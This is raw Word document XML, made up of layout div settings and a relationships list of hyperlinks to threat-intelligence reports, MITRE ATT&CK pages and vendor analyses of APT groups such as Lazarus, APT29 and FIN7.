                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2128232062">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="375854879">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474417272">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="482814157">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="490677901">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="574975532">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="591546080">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="738482620">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="760024841">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="808203081">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="851604494">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="963073295">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="998772608">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1012218375">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1103113757">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1170215107">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1206529281">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1354108824">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1412853059">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1424957391">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1433209880">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1588615274">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1867519504">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1875728679">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1930314429">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2025669464">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2032872527">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="214519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techcrunch.com/2019/03/25/asus-update-backdoor/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwarebytes.com/blog/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/nsa-russian-gru-hackers-use-kubernetes-to-run-brute-force-attacks/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0051/" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=92a4528c-2bdb-498f-85c8-4273bfdc66aa&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/lazarus-threatneedle/100803/" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://167.88.180[.]198/" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/alerts/aa22-110a" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/windows/desktop/aa365573(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/news-events/analysis-reports/ar20-133a" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.y-security.de/MITRE/groups/G0018/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://duo.com/decipher/chinese-cyber-espionage-apts-refocus-strategy" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/blog/hard-pass-declining-apt34-invite-to-join-their-professional-network" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://success.trendmicro.com/dcx/s/solution/000283386?language=en_US&amp;sfdcIFrameOrigin=null" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/eu-14/arsenal.html" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.foldersecurityviewer.com/ntfs-alternate-data-streams-the-good-and-the-bad/" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/asus-supply-chain-attack" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/blog/operation-clandestine-wolf-adobe-flash-zero-day" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/muddywater/88059/" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4114" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.softpedia.com/news/malware-that-hides-c-c-server-on-dropbox-detected-in-the-wild-496951.shtml" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wired.com/story/mysterious-return-of-years-old-chinese-malware-apt1/" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyfirma.com/outofband/nukesped-rat-report/" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielbohannon/Invoke-Obfuscation" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwarebytes.com/blog/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.binarydefense.com/threat_watch/iran-linked-apt-using-linkedin-to-spread-malware/" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.morphisec.com/asus-supply-chain-attack" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1203/" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0046/" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.controlcase.com/windows-ole-rce-the-sandworm-exploit-oct-2014/" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.researchgate.net/publication/361461315_State-of-the-Art_in_Chinese_APT_Attack_and_Using_Threat_Intelligence_for_Detection_A_Survey" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techtarget.com/searchsecurity/news/252488265/North-Koreas-BeagleBoyz-target-banks-with-ATM-cash-out-attacks" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/unc2452-merged-into-apt29" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/operation-daybreak/75100/" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hhs.gov/sites/default/files/apt41-recent-activity.pdf" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cygenta.co.uk/post/apt34-linkedin" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/pl/security/news/cyber-attacks/operation-tropic-trooper-infiltrates-secret-keepers" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/apt1-exposing-one-of-chinas-cyber-espionage-units" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/file/1080281/download" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://content.fireeye.com/apt-41/rpt-apt41" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyware.com/news/fin7-an-insight-into-the-threat-actor-groups-high-profile-attacks-e2d75540" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=92a4528c-2bdb-498f-85c8-4273bfdc66aa&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securitysift.com/windows-ole-rce-exploit-ms14-060/" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/getsystem-offsec/" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/sites/default/files/2021-09/rpt-operation-saffron-rose.pdf" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0043/" TargetMode="External"/><Relationship Id="rId30" 